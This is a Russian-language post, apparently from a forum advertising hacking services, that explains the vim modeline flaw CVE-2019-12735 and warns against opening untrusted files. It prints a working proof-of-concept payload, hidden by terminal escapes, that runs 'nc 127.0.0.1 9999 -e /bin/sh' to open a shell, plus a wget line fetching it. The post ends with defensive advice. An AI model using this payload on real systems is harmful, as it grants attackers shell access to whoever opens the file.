Jump to content
Новости и объявления.
  • Уважаемые гости. При посещении нашего сайта, просим вас ознакомиться с разделами форума, прежде чем оставлять ваши объявления и т.д. Рекомендуем посетить разделы: "Общение, Коммерческий раздел, Услуги Хакеров и статьи, Отзывы о сайте и пользователях, Черный список" и другие разделы нашего сайта. ***ВНИМАНИЕ*** При обращении за помощью, просим быть внимательными, на сайте есть, как проверенные специалисты, так и непроверенные. Если вы обратились к специалисту, который проверку НЕ проходил, рекомендуем воспользоваться услугой гарант сервиса. xakervip.com
  • Взлом
  • Взлом
  • Гарант-сервис
  • Реклама на форуме

Recommended Posts

Приветствую, хакеры! Многим известно, что запускать неизвестного происхождения файлы небезопасно, но сколько человек при этом открывает незнакомые текстовые файлы, например, в текстовом редакторе? Особенно если это Linux и какой-нибудь проверенным временем текстовый редактор vim/emacs! Что может случиться?

 

Краткое описание недавней уязвимости в vim

Не хочу вдаваться в технические подробности дырки, которую нашли в текстовом редакторе vim, об этом написано немало статей (уязвимости присвоен номер CVE-2019-12735), но хочу рассказать о том, какую опасность это несёт и почему надо быть предельно аккуратным даже с такими, казалось бы, базовыми инструментами.

Вектор атаки: вам присылают файлик, вы его открываете в vim, а тем временем у вас на компьютере выполняется код. Например, качается с удаленного сервера бекдор и устанавливается в систему. Причем вы даже не видите целиком содержимого файла, вся выполняемая конструкция замаскирована и не отображается.

 

Демонстрация экслоита

Рассмотрим один из экслоитов для vim.

   $ wget https://raw.githubusercontent.com/numirias/security/master/data/2019-06-04_ace-vim-neovim/shell.txt

А теперь попробуем его прочитать, например, утилитой cat:

   $ cat shell.txt

   Nothing here.

А вот что в файлике находится на самом деле:

   $ cat -v shell.txt

   [?7l SNothing here. :silent! w | call system('nohup nc 127.0.0.1 9999 -e /bin/sh &') | redraw! | file | silent! # " vim: set fen fdm=expr fde=assert_fails('set\ fde=x\ \|\ source\!\ \%') fdl=0:   [1G  [KNothing here."  [D

То есть вы качаете незнакомый файлик, открываете его в уязвимом текстовом редакторе и у вас открывается шелл на 9999-порту и делай дальше с вашей машиной что хочешь.

 

Вывод

Открытие незнакомых текстовых файлов даже в текстовых редакторах может быть опасным.

Если вы не доверяете источнику, с которого скачен файл, лучше запустить его в изолированном окружении вроде виртуальной машины, или тестовой vps.

Как вариант — добавьте в ваш шелл (например, ~/.zshrc) следующий alias, чтобы хоть как-то обнаружить возможную маскировку шелл-кода в незнакомом файле. При условии что это не эксплоит к утилите cat, или терминалу.

   alias cv='cat -v'

Ну и конечно же не забывайте обновлять всё ПО и ОС на всех ваших девайсах.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 

 

 

Link to comment
Share on other sites

  • Реклама на форуме

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Loading...

  • Member Statistics

    6,324
    Total Members
    30,834
    Most Online
    Елен
    Newest Member
    Елен
    Joined
×
×
  • Create New...

Important Information

Guidelines
Terms of Use
We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.